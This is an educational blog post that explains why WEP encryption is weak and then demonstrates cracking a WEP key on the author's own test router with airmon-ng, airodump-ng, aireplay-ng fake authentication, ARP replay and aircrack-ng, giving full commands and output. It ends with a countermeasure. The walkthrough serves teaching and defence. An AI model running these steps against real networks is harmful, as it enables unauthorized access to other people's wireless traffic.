Contents

Introduction
Encryption
WEP Vulnerability
Tools
Step 1: Find Target
Step 2: Capture IVs
Step 3: Fake Authentication
Step 4: ARP Request Replay
Step 5: Crack the Key
Countermeasure

Introduction

WEP (Wired Equivalent Privacy) Hacking is already an old topic. It is really not easy to find an Access Point (AP) which is still using WEP to hack nowadays. However, to understand the method and steps for hacking WEP really helps for learning Kali Linux. It also helps for learning hack to WPA and WPA2. We can search millions of articles describe how to hack WEP with step by step procedures. But they seldom talk about the theory. I will explain the WEP vulnerability in this article.

⛑️  Please be reminded that the aim of this article is to explain the network threats and how to eliminate the issue. Illegal activities are not encouraged⛑️

Encryption

Since wireless signal is transmitted through the air, anyone can receive it. So, the transmitted messages are needed to be encrypted. Symmetric Encryption is a good choice. It means that the transmitter will use a common shared key to encrypt the message. And the receivers will use the same key for decryption. For details, please see the article that about Cryptography.

A large amount of data is needed to transmit in a wireless network, so a short shared key is not enough for encryption. Instead of the short shared key, a long key stream is used. The shared key can be put into a Stream Cipher or called Key Stream Generator to generate a long key stream. WEP use RC4 as a Key Stream Cipher.

WEP Attack

Source

But it is easy to be cracked if the same key stream is always used. So, a 24bits number is added to RC4 to generate Key Stream with the shared key. It is called Initialization Vector (IV). Every time when a message is sent, a new IV is generated in order to have different key stream. So this is the encryption algorithm of WEP.

In the following diagram, the procedure of transmitting from AP to client is shown. Please be reminded that the IV is transmitted without encryption, it can be captured with the encrypted message if someone wants. On the other hand, if a client wants to send data to AP, the procedure is same except the client will use the IV that is created by the client itself.

WEP Attack

WEP Vulnerability

A history lesson first, RC4 is designed by RSA Data Security Company in 1987. Originally, it is a RSA proprietary encryption method. In 1994, the source code of RC4 is posted on the Internet. After that, someone modify RC4 to become ARC4 and ARCFOUR. All these things are called RC4. RC4 is commonly used due to its small resource expend and high efficiency. Although the source code is opened, it is still hard to crack if the key is not known.

However, add IV to RC4 helps cryptographic experts to know a small part of key stream by using Mathematic method so that a small part of shared key is also known. Theoretically, the entire shared key can be calculated by collect a large amount of IVs. So, the direction of cracking WEP is to capture a large amount of IVs and put them into analytic tool to compute the shared key. The success rate is proportional to the number of IVs. Here are some famous Mathematic methods for cracking shared key,

MethodAnnounced YearSuccess RateRemark
FMS 2001 50% if 4,000,000 IVs are collected
65% if 11,000,000 IVs are collected
 
KoreK 2004 50% if 1,500,000 IVs are collected
95% if 5,000,000 IVs are collected
 
PTW 2007 55% if 45,000 IVs are collected
More than 95% if 80,000 IVs are collected
The most common and efficient method nowadays,
but it only analyzes the ARP frames.

Tools

Aircrack-ng is the most famous and powerful Wireless Encryption Shared Key cracking tool. It can be found in Kali Linux. A wireless LAN card that support monitor mode is also needed for cracking. The following brands and models are compatible to Kali Linux (Debian),

BrandModelRemark
Alfa AWUS036H  
Alfa AWUS036NH  
Alfa AWUS036NHA  
Alfa SWUS051NH  
Panda PAU05 I am using this model. It is nice and small.
TP-Link TL-WN722N New version V2 do not support Kali Linux yet. Be careful when buying.
Netgear WG111v2  

Step 1: Find Target

First, enable monitor mode of the wireless interface. A monitor interface will be created.

root@KALI:~# airmon-ng start wlan0

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  491 NetworkManager
 4722 wpa_supplicant

PHY     Interface       Driver          Chipset

phy0    wlan0           rt2800usb       Ralink Technology, Corp. RT5372

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

Then, scan the wireless signal and see whether there are any APs still using WEP? Of course, you cannot find one. So, I have prepared a wireless router for testing. Remember the BSSID (MAC Address of the AP), Channel and ESSID.

root@KALI:~# airodump-ng wlan0mon

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:24:A5:BC:15:5D  -31        7        0    0  11  54e  WEP  WEP         Testing
 88:75:56:㊙️:㊙️:㊙️  -54        8        0    0   5  54e  WPA2 CCMP   PSK  CISCO
 C8:3A:35:㊙️:㊙️:㊙️  -68        3        1    0   8  54e  WPA2 CCMP   PSK  Sweet Dream
 C8:3A:35:㊙️:㊙️:㊙️  -69        3        1    0   8  54e  WPA2 CCMP   PSK  Whatthehell
 78:96:82:㊙️:㊙️:㊙️  -71        4        0    0   6  54e  WPA2 CCMP   PSK  Default
 

Since the target is using channel 11, change the monitor mode to focus on channel 11 for the attack.

root@KALI:~# airmon-ng stop wlan0mon

PHY     Interface       Driver          Chipset

phy0    wlan0mon        rt2800usb       Ralink Technology, Corp. RT5372

                (mac80211 station mode vif enabled on [phy0]wlan0)

                (mac80211 monitor mode vif disabled for [phy0]wlan0mon)

root@KALI:~# airmon-ng start wlan0 11


PHY     Interface       Driver          Chipset

phy0    wlan0           rt2800usb       Ralink Technology, Corp. RT5372

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

Step 2: Capture IVs

Use airodump-ng -c 11 --bssid 00:24:A5:BC:15:5D -w output wlan0mon to capture frames of the target AP in channel 11 and save them in the file called output. Now, what we need to do is waiting for enough number of IVs to launch the cracking.

CH  11 ][ Elapsed: 2 mins ][ 2017-05-28 21:27

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E

 00:24:A5:BC:15:5D  -36 100     1223       14    0   7  54e. WEP  WEP    OPN  T

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 00:24:A5:BC:15:5D  9C:EF:D5:FE:4B:1B    0    1 - 1      0       66

Step 3: Fake Authentication

If we do not want to wait for a long time, we can create network traffic to force the AP to generate IVs for capturing. To accomplis, it is needed to associate to the AP. But we do not have the shared key, how to associate to the AP? Let me introduce the other vulnerability of WEP.

Let us check how an AP accepts a client first. When a client wants to associate to the AP, it sends an authentication request to the AP. Then, the AP generates a random text (also called challenge) and sends back to the client. Then, the client uses its own IV and shared key to generate key stream to encrypt the challenge. The encrypted challenge and the IV will be sent to the AP. Finally, AP uses the received IV and its own shared key to generate the key stream to decrypt the encrypted challenge. If it can be recovered to the original challenge, the AP trust that they have the same shared key.

WEP Attack

Source

Unfortunately, attacker can capture the frame which contains the challenge and the encrypted challenge to compute the key stream (not shared key) as well as the IV that used in the frames. Later, the attacker send authentication request to the AP, and use the key stream that computed before to encrypt the challenge and send it back with the captured IV to the AP. The beauty of the fake authentication is the attacker can cheat the AP even he or she never knows the shared key.

Now, open a new terminal to implement the fake authentication. Use aireplay-ng -1 10 -a 00:24:A5:BC:15:5D -h 9C:EF:D5:FE:4B:1B wlan0mon command where 10 means that the attack will be implemented every 10 seconds. –a is the BSSID of the AP. –h is the MAC address of the attacker’s interface. If the attack successes, the message “Association successful” will be displayed.

root@KALI:~# aireplay-ng -1 10 -a 00:24:A5:BC:15:5D -h 9C:EF:D5:FE:4B:1B wlan0mon
17:40:56  Waiting for beacon frame (BSSID: 00:24:A5:BC:15:5D) on channel 11

17:40:56  Sending Authentication Request (Open System) [ACK]
17:40:56  Authentication successful
17:40:56  Sending Association Request [ACK]
17:40:56  Association successful :-) (AID: 1)

17:41:06  Sending Authentication Request (Open System) [ACK]
17:41:06  Authentication successful
17:41:06  Sending Association Request [ACK]
17:41:06  Association successful :-) (AID: 1)

Step 4: ARP Request Replay

We can generate ARP Request (Please check the following article for the theory of ARP). According to the ARP property, AP will broadcast the message when receives the ARP Request. When AP broadcast the message, new IV is generated and it will be captured and stored. But how we make the AP accepts the ARP Request? As same as fake authentication, we can capture the ARP Request and inject back to the network. Thanks to cryptographic experts, we know the pattern of ARP frame even it is encrypted.

Open a new terminal, use aireplay-ng -3 -b 00:24:A5:BC:15:5D -h 9C:EF:D5:FE:4B:1B wlan0mon to implement the ARP Request Replay. In order to replay successfully, there must be at least one ARP request appears on the network. It should be fine for a normal network. For the testing network however, there may not have any network traffic. For this situation, you may associate a client to the AP and create an ARP request by using ping.

root@KALI:~# aireplay-ng -3 -b 00:24:A5:BC:15:5D -h 9C:EF:D5:FE:4B:1B wlan0mon
21:29:38  Waiting for beacon frame (BSSID: 00:24:A5:BC:15:5D) on channel 7
Saving ARP requests in replay_arp-0528-212938.cap
You should also start airodump-ng to capture replies.
Read 93344 packets (got 48340 ARP requests and 26904 ACKs), sent 30077 packets...(499 pps)

Step 5: Crack the Key

At last, use aircrack-ng to crack the shared key. But, tens of thousands IVs are needed even used PTW. So, is it needed to collect enough IVs before implement the key cracking? No, the cracking and capturing can be run simultaneously. So, we should run the capturing, fake authentication, ARP replay and cracking at the same time. One to two minutes is enough to crack a shared key if lucky.

Open a new terminal, enter aircrack-ng -b 00:24:A5:BC:15:5D output*.cap command and default method is PTW. If you want to use FMS/KoreK, add -K in the command to become aircrack-ng -K -b 00:24:A5:BC:15:5D output*.cap.

                                 Aircrack-ng 1.2 rc4


                 [00:02:42] Tested 741 keys (got 54980 IVs)

   KB    depth   byte(vote)
    0    3/ 13   A8(62464) DA(61696) 9A(61440) 1C(61184) 1E(61184)
    1    2/  1   AF(63488) 31(63232) 7F(62976) FF(62976) 82(62720)
    2    0/  1   19(78848) 03(62720) 0D(62720) 3C(62464) 45(62464)
    3    0/  2   87(76288) C4(67840) 66(64512) DD(64256) 2D(64000)
    4   22/  4   FC(59904) 08(59648) 11(59648) 3C(59648) 4D(59648)

     KEY FOUND! [ 4A:61:6E:6E:65:74:2E:68:6B:21:40:23:24 ] (ASCII: Jannet.hk!@#$)
        Decrypted correctly: 100%

Countermeasure

Obviously, WEP is already compromised to the attack and should not be used in the wireless network anymore. It should be replaced by WPA2 or 802.1x authentiation method.